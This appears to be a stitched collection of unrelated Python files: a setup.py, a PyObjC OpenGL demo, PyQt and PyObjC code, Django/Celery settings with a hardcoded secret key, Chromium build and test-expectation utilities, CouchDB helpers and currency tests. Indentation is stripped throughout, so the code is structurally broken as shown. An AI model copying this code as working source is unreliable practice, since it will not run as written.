author_email='sully4792@gmail.com',
install_requires=REQUIRES,
url=GITHUB_URL,
download_url='https://github.com/condad/google-objects/tarball/' + VERSION,
keywords=['google api', 'google sheets', 'google drive', 'google slides'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Libraries :: Python Modules',
],
entry_points={
'console_scripts': [
'sheets-cli = google_objects.cli:main',
],
},
)
|
"""OpenGLDemo.py -- A simple demo of using OpenGL with Cocoa
To build the demo program, run this line in Terminal.app:
$ python setup.py py2app -A
This creates a directory "dist" containing OpenGLDemo.app. (The
-A option causes the files to be symlinked to the .app bundle instead
of copied. This means you don't have to rebuild the app if you edit the
sources or nibs.)
This example requires PyOpenGL
"""
import objc
from Cocoa import *
from OpenGL.GL import *
from PyObjCTools import AppHelper
ClearColors = redIndex, greenIndex, blueIndex, alphaIndex = range(4)
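# These indices select which RGBA channel of the clear color is set to 1.0;
# the UI buttons supply the index via their tag (see setClearColor_ below).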
class OpenGLDemoView(NSOpenGLView):
def awakeFromNib(self):
self.color_index = alphaIndex
def initWithFrame_(self, frame):
attribs = [
NSOpenGLPFANoRecovery,
NSOpenGLPFAWindow,
NSOpenGLPFAAccelerated,
NSOpenGLPFADoubleBuffer,
NSOpenGLPFAColorSize, 24,
NSOpenGLPFAAlphaSize, 8,
NSOpenGLPFADepthSize, 24,
NSOpenGLPFAStencilSize, 8,
NSOpenGLPFAAccumSize, 0,
]
fmt = NSOpenGLPixelFormat.alloc().initWithAttributes_(attribs)
self = super(OpenGLDemoView, self).initWithFrame_pixelFormat_(frame, fmt)
return self
@objc.IBAction
def setClearColor_(self, sender):
self.color_index = sender.tag()
self.setNeedsDisplay_(True)
def drawRect_(self, ((x, y), (w, h))):
glViewport(0, 0, w, h)
clear_color = [0.0]*4
clear_color[self.color_index] = 1.0
glClearColor(*clear_color)
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT|GL_STENCIL_BUFFER_BIT)
self.openGLContext().flushBuffer()
if __name__ == "__main__":
AppHelper.runEventLoop()
|
from PyQt4.QtCore import QSize
from PyQt4.QtGui import QVBoxLayout
class MyVBoxLayout(QVBoxLayout):
def __init__(self, parent=None):
QVBoxLayout.__init__(self, parent)
self._last_size = QSize(0, 0)
def setGeometry(self, r):
QVBoxLayout.setGeometry(self, r)
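# Propagate our minimum size (plus the title bar height) up to the
# grandparent, assuming parentWidget().parentWidget() is a QDockWidget.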
try:
wid = self.parentWidget().parentWidget()
new_size = self.minimumSize()
if new_size == self._last_size: return
self._last_size = new_size
twid = wid.titleBarWidget()
if twid is not None:
theight = twid.sizeHint().height()
else:
theight = 0
new_size += QSize(0, theight)
wid.setMinimumSize(new_size)
except Exception:
pass
|
from Foundation import *
from PyObjCTools.TestSupport import *
class TestNSXMLNodeOptions (TestCase):
def testConstants(self):
self.assertEqual(NSXMLNodeOptionsNone, 0)
self.assertEqual(NSXMLNodeIsCDATA, 1 << 0)
self.assertEqual(NSXMLNodeExpandEmptyElement, 1 << 1)
self.assertEqual(NSXMLNodeCompactEmptyElement, 1 << 2)
self.assertEqual(NSXMLNodeUseSingleQuotes, 1 << 3)
self.assertEqual(NSXMLNodeUseDoubleQuotes, 1 << 4)
self.assertEqual(NSXMLDocumentTidyHTML, 1 << 9)
self.assertEqual(NSXMLDocumentTidyXML, 1 << 10)
self.assertEqual(NSXMLDocumentValidate, 1 << 13)
self.assertEqual(NSXMLNodeLoadExternalEntitiesAlways, 1 << 14)
self.assertEqual(NSXMLNodeLoadExternalEntitiesSameOriginOnly, 1 << 15)
self.assertEqual(NSXMLNodeLoadExternalEntitiesNever, 1 << 19)
self.assertEqual(NSXMLDocumentXInclude, 1 << 16)
self.assertEqual(NSXMLNodePrettyPrint, 1 << 17)
self.assertEqual(NSXMLDocumentIncludeContentTypeDeclaration, 1 << 18)
self.assertEqual(NSXMLNodePreserveNamespaceOrder, 1 << 20)
self.assertEqual(NSXMLNodePreserveAttributeOrder, 1 << 21)
self.assertEqual(NSXMLNodePreserveEntities, 1 << 22)
self.assertEqual(NSXMLNodePreservePrefixes, 1 << 23)
self.assertEqual(NSXMLNodePreserveCDATA, 1 << 24)
self.assertEqual(NSXMLNodePreserveWhitespace, 1 << 25)
self.assertEqual(NSXMLNodePreserveDTD, 1 << 26)
self.assertEqual(NSXMLNodePreserveCharacterReferences, 1 << 27)
self.assertEqual(NSXMLNodePreserveEmptyElements, (
NSXMLNodeExpandEmptyElement | NSXMLNodeCompactEmptyElement))
self.assertEqual(NSXMLNodePreserveQuotes, (NSXMLNodeUseSingleQuotes | NSXMLNodeUseDoubleQuotes))
self.assertEqual(NSXMLNodePreserveAll & 0xFFFFFFFF, 0xFFFFFFFF & (
NSXMLNodePreserveNamespaceOrder |
NSXMLNodePreserveAttributeOrder |
NSXMLNodePreserveEntities |
NSXMLNodePreservePrefixes |
NSXMLNodePreserveCDATA |
NSXMLNodePreserveEmptyElements |
NSXMLNodePreserveQuotes |
NSXMLNodePreserveWhitespace |
NSXMLNodePreserveDTD |
NSXMLNodePreserveCharacterReferences |
0xFFF00000))
if __name__ == "__main__":
main()
|
import os.path as path
import sys
root = path.abspath(path.dirname(__file__))
sys.path.insert(0, root)
|
from __future__ import absolute_import
from sentry.models import Activity
from .mail import ActivityMailDebugView
class DebugUnassignedEmailView(ActivityMailDebugView):
def get_activity(self, request, event):
return {"type": Activity.UNASSIGNED, "user": request.user}
|
DEBUG = True
TEMPLATE_DEBUG = DEBUG
CARROT_BACKEND = "amqp"
CELERY_RESULT_BACKEND = "database"
BROKER_HOST = "localhost"
BROKER_VHOST = "/"
BROKER_USER = "guest"
BROKER_PASSWORD = "guest"
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = 'sqlite3'
DATABASE_NAME = 'development.db'
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
ADMIN_MEDIA_PREFIX = '/media/'
SECRET_KEY = '#1i=edpk55k3781$z-p%b#dbn&n+-rtt83pgz2o9o)v8g7(owq'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
ROOT_URLCONF = 'celery_http_gateway.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or
# "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'djcelery',
)
|
import logging
logger = logging.getLogger(__name__)
logger.warning('DEPRECATED: pyface.grid, use pyface.ui.wx.grid instead.')
from pyface.ui.wx.grid.inverted_grid_model import *
|
from string import Template
import optparse
import os
import sys
try:
grit_module_path = os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'tools', 'grit')
sys.path.insert(0, grit_module_path)
from grit.format import data_pack as DataPack
except ImportError, e:
print 'ImportError: ', e
sys.exit(-1)
def is_ascii(s):
return all(ord(c) < 128 for c in s)
header_template = \
"""// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef HTML_VIEWER_BLINK_RESOURCE_MAP_H_
#define HTML_VIEWER_BLINK_RESOURCE_MAP_H_

#include <map>

namespace html_viewer {
class BlinkResourceMap {
public:
BlinkResourceMap();
const char* GetResource(int id, int* length);
private:
struct ResourceEntry {
const char* data;
int length;
ResourceEntry()
: data(nullptr)
, length(0) {
}
ResourceEntry(const char* data, int length)
: data(data)
, length(length) {
}
};
typedef std::map<int, ResourceEntry> ResourceMap;
ResourceMap resources_;
};
} // namespace html_viewer

#endif // HTML_VIEWER_BLINK_RESOURCE_MAP_H_"""
cpp_template = \
"""// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "$header_file_name"

#include "base/macros.h"  // for arraysize()

namespace html_viewer {
$definitions
BlinkResourceMap::BlinkResourceMap()
{
$map_initializer
}
const char* BlinkResourceMap::GetResource(int id, int* length)
{
ResourceMap::iterator it = resources_.find(id);
if (it == resources_.end()) {
*length = 0;
return nullptr;
}
*length = it->second.length;
return it->second.data;
}
} // namespace html_viewer"""
def main():
parser = optparse.OptionParser(
usage='Usage: %prog --pak-file PAK_FILE --header HEADER --cpp CPP\n')
parser.add_option('-i', '--pak-file', action='store', dest='pak_file',
help='The .pak file to be extracted.')
parser.add_option('', '--header', action='store', dest='header_file',
help='Header file to be generated.')
parser.add_option('', '--cpp', action='store', dest='cpp_file',
help='C++ file to be generated.')
(options, _) = parser.parse_args()
if (not options.pak_file or not options.header_file or not options.cpp_file):
parser.print_help()
sys.exit(-1)
header_file = open(options.header_file, 'w+')
cpp_file = open(options.cpp_file, 'w+')
pak_contents = DataPack.ReadDataPack(options.pak_file)
resourceIds = []
header_contents = dict()
cpp_contents = dict()
definitions = []
for (resId, data) in pak_contents.resources.iteritems():
if not is_ascii(data):
continue
resourceIds.append(resId)
hex_values = ['0x{0:02x}'.format(ord(char)) for char in data]
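# Wrap the hex byte literals into rows of 12 so the generated array stays
# readable.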
f = lambda A, n=12: [A[i:i+n] for i in range(0, len(A), n)]
hex_values_string = ',\n '.join(', '.join(x) for x in f(hex_values))
cpp_definition = \
'const char kResource%s[%d] = {\n %s \n};' % \
(str(resId), len(hex_values), hex_values_string)
definitions.append(cpp_definition)
header_file_contents = Template(header_template).substitute(header_contents)
header_file.write(header_file_contents)
header_file.close()
map_initializer = []
for resId in resourceIds:
insert_statement = \
'resources_.insert(std::pair<int, ResourceEntry>(\n' \
' %s, ResourceEntry(kResource%s, arraysize(kResource%s))));'
map_initializer.append( \
insert_statement % (str(resId), str(resId), str(resId)))
cpp_contents['definitions']= '\n'.join(definitions)
cpp_contents['header_file_name'] = os.path.basename(options.header_file)
cpp_contents['map_initializer'] = '\n '.join(map_initializer)
cpp_file_contents = Template(cpp_template).substitute(cpp_contents)
cpp_file.write(cpp_file_contents)
cpp_file.close()
if __name__ == '__main__':
main()
|
'''This allows running a bit of code on couchdb docs.
The code should take a JSON python object, modify it and hand it back.
Not quite that slick yet; need a way to pass in code or make this a decorator.
'''
import importlib
from harvester.collection_registry_client import Collection
from harvester.couchdb_init import get_couchdb
COUCHDB_VIEW = 'all_provider_docs/by_provider_name'
def run_on_couchdb_by_collection(func, collection_key=None):
'''Run func over the docs in couchdb, by collection.
If collection_key is None, this tries to grab all of the docs and modify
them (can take a long time - not recommended).
func is a function that takes a couchdb doc in and returns it modified.
Function should return the new document, or None if no changes were made.
'''
_couchdb = get_couchdb()
v = _couchdb.view(COUCHDB_VIEW, include_docs='true', key=collection_key) \
if collection_key else _couchdb.view(COUCHDB_VIEW,
include_docs='true')
doc_ids = []
n = 0
for r in v:
n += 1
doc_new = func(r.doc)
if doc_new and doc_new != r.doc:
_couchdb.save(doc_new)
doc_ids.append(r.doc['_id'])
if n % 100 == 0:
print '{} docs ran. Last doc:{}\n'.format(n, r.doc['_id'])
return doc_ids
def run_on_couchdb_doc(docid, func):
'''Run on a doc, by doc id'''
_couchdb = get_couchdb()
doc = _couchdb[docid]
mod_name, func_name = func.rsplit('.', 1)
fmod = importlib.import_module(mod_name)
ffunc = getattr(fmod, func_name)
doc_new = ffunc(doc)
if doc_new and doc_new != doc:
_couchdb.save(doc_new)
return True
return False
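# Example (hypothetical doc id and dotted function path):
#   run_on_couchdb_doc('asset-123', 'mymodule.update_collection_description')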
C_CACHE = {}
def update_collection_description(doc):
cjson = doc['originalRecord']['collection'][0]
# get collection description
if 'description' not in cjson:
if cjson['@id'] in C_CACHE:
c = C_CACHE[cjson['@id']]
else:
c = Collection(url_api=cjson['@id'])
C_CACHE[cjson['@id']] = c
description = c['description'] if c['description'] else c['name']
print('DOC: {} DESCRIP: {}'.format(
doc['_id'], description.encode('utf8')))
doc['originalRecord']['collection'][0]['description'] = description
doc['sourceResource']['collection'][0]['description'] = description
return doc
def add_rights_and_type_to_collection(doc):
cjson = doc['originalRecord']['collection'][0]
# get collection description
if cjson['@id'] in C_CACHE:
c = C_CACHE[cjson['@id']]
else:
c = Collection(url_api=cjson['@id'])
C_CACHE[cjson['@id']] = c
doc['originalRecord']['collection'][0]['rights_status'] = c['rights_status']
doc['originalRecord']['collection'][0]['rights_statement'] = c['rights_statement']
doc['originalRecord']['collection'][0]['dcmi_type']=c['dcmi_type']
if 'collection' in doc['sourceResource']:
doc['sourceResource']['collection'][0]['rights_status'] = c['rights_status']
doc['sourceResource']['collection'][0]['rights_statement'] = c['rights_statement']
doc['sourceResource']['collection'][0]['dcmi_type'] = c['dcmi_type']
else:
doc['sourceResource']['collection'] = doc['originalRecord']['collection']
return doc
|
import pytest
import six
from sqlalchemy_utils import Currency, i18n
@pytest.fixture
def set_get_locale():
i18n.get_locale = lambda: i18n.babel.Locale('en')
@pytest.mark.skipif('i18n.babel is None')
@pytest.mark.usefixtures('set_get_locale')
class TestCurrency(object):
def test_init(self):
assert Currency('USD') == Currency(Currency('USD'))
def test_hashability(self):
assert len(set([Currency('USD'), Currency('USD')])) == 1
def test_invalid_currency_code(self):
with pytest.raises(ValueError):
Currency('Unknown code')
def test_invalid_currency_code_type(self):
with pytest.raises(TypeError):
Currency(None)
@pytest.mark.parametrize(
('code', 'name'),
(
('USD', 'US Dollar'),
('EUR', 'Euro')
)
)
def test_name_property(self, code, name):
assert Currency(code).name == name
@pytest.mark.parametrize(
('code', 'symbol'),
(
('USD', u'$'),
('EUR', u'€')
)
)
def test_symbol_property(self, code, symbol):
assert Currency(code).symbol == symbol
def test_equality_operator(self):
assert Currency('USD') == 'USD'
assert 'USD' == Currency('USD')
assert Currency('USD') == Currency('USD')
def test_non_equality_operator(self):
assert Currency('USD') != 'EUR'
assert not (Currency('USD') != 'USD')
def test_unicode(self):
currency = Currency('USD')
assert six.text_type(currency) == u'USD'
def test_str(self):
currency = Currency('USD')
assert str(currency) == 'USD'
def test_representation(self):
currency = Currency('USD')
assert repr(currency) == "Currency('USD')"
|
"""Various custom data types for use throughout the unexpected pass finder."""
from __future__ import print_function
import collections
import copy
import fnmatch
import logging
import six
FULL_PASS = 1
NEVER_PASS = 2
PARTIAL_PASS = 3
Expectation = None
Result = None
BuildStats = None
TestExpectationMap = None
def SetExpectationImplementation(impl):
global Expectation
assert issubclass(impl, BaseExpectation)
Expectation = impl
def SetResultImplementation(impl):
global Result
assert issubclass(impl, BaseResult)
Result = impl
def SetBuildStatsImplementation(impl):
global BuildStats
assert issubclass(impl, BaseBuildStats)
BuildStats = impl
def SetTestExpectationMapImplementation(impl):
global TestExpectationMap
assert issubclass(impl, BaseTestExpectationMap)
TestExpectationMap = impl
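# The module-level names above (Expectation, Result, BuildStats,
# TestExpectationMap) are injected with concrete subclasses at runtime so
# code in this module can instantiate project-specific implementations.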
class BaseExpectation(object):
"""Container for a test expectation.
Similar to typ's expectations_parser.Expectation class, but with unnecessary
data stripped out and made hashable.
The data contained in an Expectation is equivalent to a single line in an
expectation file.
"""
def __init__(self, test, tags, expected_results, bug=None):
self.test = test
self.tags = frozenset(tags)
self.bug = bug or ''
if isinstance(expected_results, str):
self.expected_results = frozenset([expected_results])
else:
self.expected_results = frozenset(expected_results)
# We're going to be making a lot of comparisons, and fnmatch is *much*
# slower (~40x from rough testing) than a straight comparison, so only use
# it if necessary.
if '*' in test:
self._comp = self._CompareWildcard
else:
self._comp = self._CompareNonWildcard
def __eq__(self, other):
return (isinstance(other, BaseExpectation) and self.test == other.test
and self.tags == other.tags
and self.expected_results == other.expected_results
and self.bug == other.bug)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.test, self.tags, self.expected_results, self.bug))
def _CompareWildcard(self, result_test_name):
return fnmatch.fnmatch(result_test_name, self.test)
def _CompareNonWildcard(self, result_test_name):
return result_test_name == self.test
def AppliesToResult(self, result):
"""Checks whether this expectation should have applied to |result|.
An expectation applies to a result if the test names match (including
wildcard expansion) and the expectation's tags are a subset of the result's
tags.
Args:
result: A Result instance to check against.
Returns:
True if |self| applies to |result|, otherwise False.
"""
assert isinstance(result, BaseResult)
return (self._comp(result.test) and self.tags <= result.tags)
def MaybeAppliesToTest(self, test_name):
"""Similar to AppliesToResult, but used to do initial filtering.
Args:
test_name: A string containing the name of a test.
Returns:
True if |self| could apply to a test named |test_name|, otherwise False.
"""
return self._comp(test_name)
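# Illustrative behavior (assuming a concrete Expectation subclass has been
# registered): an expectation for test 'foo/*' with tags {'win'} applies to
# a result named 'foo/bar' whose tags include 'win', because the name matches
# the wildcard and {'win'} is a subset of the result's tags.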
class BaseResult(object):
"""Container for a test result.
Contains the minimal amount of data necessary to describe/identify a result
from ResultDB for the purposes of the unexpected pass finder.
"""
def __init__(self, test, tags, actual_result, step, build_id):
"""
Args:
test: A string containing the name of the test.
tags: An iterable containing the typ tags for the result.
actual_result: The actual result of the test as a string.
step: A string containing the name of the step on the builder.
build_id: A string containing the Buildbucket ID for the build this result
came from.
"""
self.test = test
self.tags = frozenset(tags)
self.actual_result = actual_result
self.step = step
self.build_id = build_id
def __eq__(self, other):
return (isinstance(other, BaseResult) and self.test == other.test
and self.tags == other.tags
and self.actual_result == other.actual_result
and self.step == other.step and self.build_id == other.build_id)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(
(self.test, self.tags, self.actual_result, self.step, self.build_id))
class BaseBuildStats(object):
"""Container for keeping track of a builder's pass/fail stats."""
def __init__(self):
self.passed_builds = 0
self.total_builds = 0
self.failure_links = frozenset()
@property
def failed_builds(self):
return self.total_builds - self.passed_builds
@property
def did_fully_pass(self):
return self.passed_builds == self.total_builds
@property
def did_never_pass(self):
return self.failed_builds == self.total_builds
def AddPassedBuild(self):
self.passed_builds += 1
self.total_builds += 1
def AddFailedBuild(self, build_id):
self.total_builds += 1
build_link = BuildLinkFromBuildId(build_id)
self.failure_links = frozenset([build_link]) | self.failure_links
def GetStatsAsString(self):
return '(%d/%d passed)' % (self.passed_builds, self.total_builds)
def NeverNeededExpectation(self, expectation): # pylint:disable=unused-argument
"""Returns whether the results tallied in |self| never needed |expectation|.
Args:
expectation: An Expectation object that |stats| is located under.
Returns:
True if all the results tallied in |self| would have passed without
|expectation| being present. Otherwise, False.
"""
return self.did_fully_pass
def AlwaysNeededExpectation(self, expectation): # pylint:disable=unused-argument
"""Returns whether the results tallied in |self| always needed |expectation.
Args:
expectation: An Expectation object that |stats| is located under.
Returns:
True if all the results tallied in |self| would have failed without
|expectation| being present. Otherwise, False.
"""
return self.did_never_pass
def __eq__(self, other):
return (isinstance(other, BuildStats)
and self.passed_builds == other.passed_builds
and self.total_builds == other.total_builds
and self.failure_links == other.failure_links)
def __ne__(self, other):
return not self.__eq__(other)
def BuildLinkFromBuildId(build_id):
return 'http://ci.chromium.org/b/%s' % build_id
class BaseTypedMap(dict):
"""A base class for typed dictionaries.
Any child classes that override __setitem__ will have any modifications to the
dictionary go through the type checking in __setitem__.
"""
def __init__(self, *args, **kwargs): # pylint:disable=super-init-not-called
self.update(*args, **kwargs)
def update(self, *args, **kwargs):
if args:
assert len(args) == 1
other = dict(args[0])
for k, v in other.items():
self[k] = v
for k, v in kwargs.items():
self[k] = v
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def _value_type(self):
raise NotImplementedError()
def IterToValueType(self, value_type):
"""Recursively iterates over contents until |value_type| is found.
Used to get rid of nested loops, instead using a single loop that
automatically iterates through all the contents at a certain depth.
Args:
value_type: The type to recurse to and then iterate over. For example,
"BuilderStepMap" would result in iterating over the BuilderStepMap
values, meaning that the returned generator would create tuples in the
form (test_name, expectation, builder_map).
Returns:
A generator that yields tuples. The length and content of the tuples will
vary depending on |value_type|. For example, using "BuilderStepMap" would
result in tuples of the form (test_name, expectation, builder_map), while
"BuildStats" would result in (test_name, expectation, builder_name,
step_name, build_stats).
"""
if self._value_type() == value_type:
for k, v in self.items():
yield k, v
else:
for k, v in self.items():
for nested_value in v.IterToValueType(value_type):
yield (k, ) + nested_value
def Merge(self, other_map, reference_map=None):
"""Merges |other_map| into self.
Args:
other_map: A BaseTypedMap whose contents will be merged into self.
reference_map: A dict containing the information that was originally in
self. Used for ensuring that a single expectation/builder/step
combination is only ever updated once. If None, a copy of self will be
used.
"""
assert isinstance(other_map, self.__class__)
# We should only ever encounter a single updated BuildStats for an
# expectation/builder/step combination. Use the reference map to determine
# if a particular BuildStats has already been updated or not.
reference_map = reference_map or copy.deepcopy(self)
for key, value in other_map.items():
if key not in self:
self[key] = value
else:
if isinstance(value, dict):
self[key].Merge(value, reference_map.get(key, {}))
else:
assert isinstance(value, BuildStats)
# Ensure we haven't updated this BuildStats already. If the reference
# map doesn't have a corresponding BuildStats, then base_map shouldn't
# have initially either, and thus it would have been added before
# reaching this point. Otherwise, the two values must match, meaning
# that base_map's BuildStats hasn't been updated yet.
reference_stats = reference_map.get(key, None)
assert reference_stats is not None
assert reference_stats == self[key]
self[key] = value
class BaseTestExpectationMap(BaseTypedMap):
"""Typed map for string types -> ExpectationBuilderMap.
This results in a dict in the following format:
{
expectation_file1 (str): {
expectation1 (data_types.Expectation): {
builder_name1 (str): {
step_name1 (str): stats1 (data_types.BuildStats),
step_name2 (str): stats2 (data_types.BuildStats),
...
},
builder_name2 (str): { ... },
},
expectation2 (data_types.Expectation): { ... },
...
},
expectation_file2 (str): { ... },
...
}
"""
def __setitem__(self, key, value):
assert IsStringType(key)
assert isinstance(value, ExpectationBuilderMap)
super(BaseTestExpectationMap, self).__setitem__(key, value)
def _value_type(self):
return ExpectationBuilderMap
def IterBuilderStepMaps(self):
"""Iterates over all BuilderStepMaps contained in the map.
Returns:
A generator yielding tuples in the form (expectation_file (str),
expectation (Expectation), builder_map (BuilderStepMap))
"""
return self.IterToValueType(BuilderStepMap)
def AddResultList(self, builder, results, expectation_files=None):
"""Adds |results| to |self|.
Args:
builder: A string containing the builder |results| came from. Should be
prefixed with something to distinguish between identically named CI
and try builders.
results: A list of data_types.Result objects corresponding to the ResultDB
data queried for |builder|.
expectation_files: An iterable of expectation file names that these
results could possibly apply to. If None, then expectations from all
known expectation files will be used.
Returns:
A list of data_types.Result objects who did not have a matching
expectation in |self|.
"""
failure_results = set()
pass_results = set()
unmatched_results = []
for r in results:
if r.actual_result == 'Pass':
pass_results.add(r)
else:
failure_results.add(r)
# Remove any cases of failure -> pass from the passing set. If a test is
# flaky, we get both pass and failure results for it, so we need to remove
# any cases of a pass result having a corresponding, earlier failure
# result.
modified_failing_retry_results = set()
for r in failure_results:
modified_failing_retry_results.add(
Result(r.test, r.tags, 'Pass', r.step, r.build_id))
pass_results -= modified_failing_retry_results
# Group identically named results together so we reduce the number of
# comparisons we have to make.
all_results = pass_results | failure_results
grouped_results = collections.defaultdict(list)
for r in all_results:
grouped_results[r.test].append(r)
matched_results = self._AddGroupedResults(grouped_results, builder,
expectation_files)
unmatched_results = list(all_results - matched_results)
return unmatched_results
def _AddGroupedResults(self, grouped_results, builder, expectation_files):
"""Adds all results in |grouped_results| to |self|.
Args:
grouped_results: A dict mapping test name (str) to a list of
data_types.Result objects for that test.
builder: A string containing the name of the builder |grouped_results|
came from.
expectation_files: An iterable of expectation file names that these
results could possibly apply to. If None, then expectations from all
known expectation files will be used.
Returns:
A set of data_types.Result objects that had at least one matching
expectation.
"""
matched_results = set()
for test_name, result_list in grouped_results.items():
for ef, expectation_map in self.items():
if expectation_files is not None and ef not in expectation_files:
continue
for expectation, builder_map in expectation_map.items():
if not expectation.MaybeAppliesToTest(test_name):
continue
for r in result_list:
if expectation.AppliesToResult(r):
matched_results.add(r)
step_map = builder_map.setdefault(builder, StepBuildStatsMap())
stats = step_map.setdefault(r.step, BuildStats())
self._AddSingleResult(r, stats)
return matched_results
def _AddSingleResult(self, result, stats):
"""Adds |result| to |self|.
Args:
result: A data_types.Result object to add.
stats: A data_types.BuildStats object to add the result to.
"""
if result.actual_result == 'Pass':
stats.AddPassedBuild()
else:
stats.AddFailedBuild(result.build_id)
def SplitByStaleness(self):
"""Separates stored data based on expectation staleness.
Returns:
      Three TestExpectationMaps (stale_dict, semi_stale_dict, active_dict).
      Together, the three contain all of the information in |self|.
      |stale_dict| contains entries for expectations that are no longer
      helpful; |semi_stale_dict| contains entries for expectations that might
      be removable or modifiable, but have at least one failed test run;
      |active_dict| contains entries for expectations that are preventing
      failures on all builders they're active on, and thus shouldn't be
      removed.
"""
stale_dict = TestExpectationMap()
semi_stale_dict = TestExpectationMap()
active_dict = TestExpectationMap()
# This initially looks like a good target for using
# TestExpectationMap's iterators since there are many nested loops.
# However, we need to reset state in different loops, and the alternative of
# keeping all the state outside the loop and resetting under certain
# conditions ends up being less readable than just using nested loops.
for expectation_file, expectation_map in self.items():
for expectation, builder_map in expectation_map.items():
# A temporary map to hold data so we can later determine whether an
# expectation is stale, semi-stale, or active.
tmp_map = {
FULL_PASS: BuilderStepMap(),
NEVER_PASS: BuilderStepMap(),
PARTIAL_PASS: BuilderStepMap(),
}
split_stats_map = builder_map.SplitBuildStatsByPass(expectation)
for builder_name, (fully_passed, never_passed,
partially_passed) in split_stats_map.items():
if fully_passed:
tmp_map[FULL_PASS][builder_name] = fully_passed
if never_passed:
tmp_map[NEVER_PASS][builder_name] = never_passed
if partially_passed:
tmp_map[PARTIAL_PASS][builder_name] = partially_passed
def _CopyPassesIntoBuilderMap(builder_map, pass_types):
for pt in pass_types:
for builder, steps in tmp_map[pt].items():
builder_map.setdefault(builder, StepBuildStatsMap()).update(steps)
# Handle the case of a stale expectation.
if not (tmp_map[NEVER_PASS] or tmp_map[PARTIAL_PASS]):
builder_map = stale_dict.setdefault(
expectation_file,
ExpectationBuilderMap()).setdefault(expectation, BuilderStepMap())
_CopyPassesIntoBuilderMap(builder_map, [FULL_PASS])
# Handle the case of an active expectation.
elif not tmp_map[FULL_PASS]:
builder_map = active_dict.setdefault(
expectation_file,
ExpectationBuilderMap()).setdefault(expectation, BuilderStepMap())
_CopyPassesIntoBuilderMap(builder_map, [NEVER_PASS, PARTIAL_PASS])
# Handle the case of a semi-stale expectation.
else:
# TODO(crbug.com/998329): Sort by pass percentage so it's easier to
# find problematic builders without highlighting.
builder_map = semi_stale_dict.setdefault(
expectation_file,
ExpectationBuilderMap()).setdefault(expectation, BuilderStepMap())
_CopyPassesIntoBuilderMap(builder_map,
[FULL_PASS, PARTIAL_PASS, NEVER_PASS])
return stale_dict, semi_stale_dict, active_dict
def FilterOutUnusedExpectations(self):
"""Filters out any unused Expectations from stored data.
An Expectation is considered unused if its corresponding dictionary is
empty. If removing Expectations results in a top-level test key having an
empty dictionary, that test entry will also be removed.
Returns:
      A dict from expectation file name (str) to a list of unused expectations
      (data_types.Expectation) from that file.
"""
logging.info('Filtering out unused expectations')
unused = collections.defaultdict(list)
unused_count = 0
for (expectation_file, expectation,
builder_map) in self.IterBuilderStepMaps():
if not builder_map:
unused[expectation_file].append(expectation)
unused_count += 1
for expectation_file, expectations in unused.items():
for e in expectations:
del self[expectation_file][e]
logging.debug('Found %d unused expectations', unused_count)
empty_files = []
for expectation_file, expectation_map in self.items():
if not expectation_map:
empty_files.append(expectation_file)
for empty in empty_files:
del self[empty]
logging.debug('Found %d empty files: %s', len(empty_files), empty_files)
return unused
class ExpectationBuilderMap(BaseTypedMap):
"""Typed map for Expectation -> BuilderStepMap."""
def __setitem__(self, key, value):
assert isinstance(key, BaseExpectation)
assert isinstance(value, self._value_type())
super(ExpectationBuilderMap, self).__setitem__(key, value)
def _value_type(self):
return BuilderStepMap
class BuilderStepMap(BaseTypedMap):
"""Typed map for string types -> StepBuildStatsMap."""
def __setitem__(self, key, value):
assert IsStringType(key)
assert isinstance(value, self._value_type())
super(BuilderStepMap, self).__setitem__(key, value)
def _value_type(self):
return StepBuildStatsMap
def SplitBuildStatsByPass(self, expectation):
"""Splits the underlying BuildStats data by passing-ness.
Args:
expectation: The Expectation that this BuilderStepMap is located under.
Returns:
A dict mapping builder name to a tuple (fully_passed, never_passed,
partially_passed). Each *_passed is a StepBuildStatsMap containing data
for the steps that either fully passed on all builds, never passed on any
builds, or passed some of the time.
"""
retval = {}
for builder_name, step_map in self.items():
fully_passed = StepBuildStatsMap()
never_passed = StepBuildStatsMap()
partially_passed = StepBuildStatsMap()
for step_name, stats in step_map.items():
if stats.NeverNeededExpectation(expectation):
assert step_name not in fully_passed
fully_passed[step_name] = stats
elif stats.AlwaysNeededExpectation(expectation):
assert step_name not in never_passed
never_passed[step_name] = stats
else:
assert step_name not in partially_passed
partially_passed[step_name] = stats
retval[builder_name] = (fully_passed, never_passed, partially_passed)
return retval
def IterBuildStats(self):
"""Iterates over all BuildStats contained in the map.
Returns:
A generator yielding tuples in the form (builder_name (str), step_name
(str), build_stats (BuildStats)).
"""
return self.IterToValueType(BuildStats)
class StepBuildStatsMap(BaseTypedMap):
"""Typed map for string types -> BuildStats"""
def __setitem__(self, key, value):
assert IsStringType(key)
assert isinstance(value, self._value_type())
super(StepBuildStatsMap, self).__setitem__(key, value)
def _value_type(self):
return BuildStats
def IsStringType(s):
return isinstance(s, six.string_types)
Expectation = BaseExpectation
Result = BaseResult
